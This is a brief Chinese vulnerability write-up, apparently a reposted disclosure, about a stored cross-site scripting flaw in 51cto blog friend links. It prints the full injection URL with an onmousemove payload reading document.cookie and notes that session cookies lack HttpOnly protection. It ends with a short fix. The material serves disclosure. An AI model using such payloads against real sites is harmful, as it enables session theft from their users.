网站地图    收藏   

主页 > 后端 > 网站安全 >

51cto博客友情链接过滤问题可以获得登录用户co

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 友情链接过滤不严格,导致可以进行DOM结构注入。从而注入js攻击。另外cookie重要的登录项无httponly 保护,从而可以得到其他用户的登录会话。发生问题的地方。 增加友情链接http: dl52...

友情链接过滤不严格,导致可以进行DOM结构注入。从而注入js攻击。
另外cookie重要的登录项无httponly 保护,从而可以得到其他用户的登录会话。

发生问题的地方。 增加友情链接
http://dl528888.blog.51cto.com/mod/edit_flink.php?type=addflink&uid=1030776&flink=www.iamle.com%22%20onmousemove=%22alert(document.cookie)%22
get参数

uid 为51tco用户id号 

flink 为 构建为 www.iamle.com%22%20onmousemove=%22alert(document.cookie)%22

最后生成的dom结构是



<a href="http://www.iamle.com" onmousemove="alert(document.cookie)" "="" title="峰云,就她了。" target="_blank">峰云,就她了。</a>
当鼠标放到本链接的时候就可以弹出 cookie。
敏感cookie无httponly保护,可以直接获得。
可以钓到其他用户的登录会话,从而得到其他用户后台。

增加友情链接


http://dl528888.blog.51cto.com/mod/edit_flink.php?type=addflink&uid=1030776&flink=www.2cto.com%22%20onmousemove=%22alert(document.cookie)%22

增加后看dom结构

http://300421.blog.51cto.com/



利用成功,可以执行任意js

发现所有cookie都没有 http only ,登录会话的铭感cookie也就没保护。

漏洞紧急修补方案:

严格过滤网址

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论